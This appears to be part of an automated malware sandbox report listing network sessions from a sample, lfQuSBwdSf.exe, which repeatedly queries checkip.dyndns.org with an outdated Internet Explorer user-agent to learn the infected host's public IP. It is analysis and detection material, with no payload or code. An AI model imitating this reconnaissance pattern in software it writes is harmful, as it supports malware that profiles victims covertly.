                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        15192.168.2.349769162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:22.463843107 CEST5119OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:22.569499016 CEST5119INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        16192.168.2.349770162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:24.109728098 CEST5120OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:24.214984894 CEST5120INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        17192.168.2.349771162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:25.727107048 CEST5121OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:25.835148096 CEST5121INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        18192.168.2.349772162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:26.918950081 CEST5122OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:27.026371956 CEST5122INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        19192.168.2.349773162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:27.954987049 CEST5123OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:28.061099052 CEST5123INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.349722162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:02:37.180475950 CEST4940OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:02:37.285245895 CEST4941INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        20192.168.2.349774162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:29.059497118 CEST5124OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:29.167048931 CEST5124INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        21192.168.2.349775162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:29.584446907 CEST5125OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2021 11:03:29.689801931 CEST5126INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        22192.168.2.349776162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:29.802161932 CEST5126OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:29.908320904 CEST5127INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        23192.168.2.349778162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:30.080657959 CEST5131OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.185421944 CEST5133INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        24192.168.2.349779162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:30.261841059 CEST5134OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.367794991 CEST5134INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        25192.168.2.349780162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:30.485392094 CEST5135OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.592964888 CEST5135INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        26192.168.2.349781162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:30.704296112 CEST5136OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.812805891 CEST5136INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        27192.168.2.349782162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:30.921722889 CEST5137OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.028373957 CEST5137INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        28192.168.2.349784162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:31.139547110 CEST5138OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.245043039 CEST5138INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        29192.168.2.349783162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:31.139666080 CEST5138OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.245871067 CEST5139INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.349726162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:03.263449907 CEST4965OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:03.370083094 CEST4966INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        30192.168.2.349785162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:31.359153986 CEST5139OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.465229988 CEST5140INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        31192.168.2.349787162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:31.574191093 CEST5141OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.680071115 CEST5142INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        32192.168.2.349788162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:31.793252945 CEST5147OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.899229050 CEST5149INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        33192.168.2.349789162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:32.138542891 CEST5154OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.243829012 CEST5154INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        34192.168.2.349790162.88.193.7080C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:03:32.355576038 CEST5155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.463823080 CEST5155INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
